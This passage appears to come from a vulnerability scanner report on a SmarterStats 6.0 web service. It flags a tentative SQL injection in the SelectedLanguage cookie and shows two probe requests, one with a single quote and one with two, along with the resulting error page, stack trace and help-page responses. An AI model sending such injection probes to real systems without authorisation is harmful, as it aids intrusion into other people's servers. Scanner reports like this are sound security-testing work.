<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="LogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneIndex:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneIndex"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSite2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;/AddSite2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSite2Result&gt;
&lt;/AddSite2Response&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;/AddSite2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSite2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSite2Result&gt;
&lt;/AddSite2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSite2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSite2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.14. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [SelectedLanguage cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The SelectedLanguage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SelectedLanguage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage='; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:21 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetAllSites2 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=''; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:22 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 28998
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetAllSites2</h2>
<p class="intro">Returns all sites listed in the MRS with multiple log locations.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetAllSites2' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">IncludeDetails:</td>
<td><input class="frmInput" type="text" size="50" name="IncludeDetails"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetAllSites2"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2 xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;IncludeDetails&gt;<font class=value>boolean</font>&lt;/IncludeDetails&gt;
&lt;/GetAllSites2&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetAllSites2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetAllSites2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteSettingInfo&gt;
&lt;SiteSettingInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;LogLocations xsi:nil="true" /&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_LogWildcard&gt;<font class=value>string</font>&lt;/ftp_LogWildcard&gt;
&lt;ftp_LogMaxDays&gt;<font class=value>int</font>&lt;/ftp_LogMaxDays&gt;
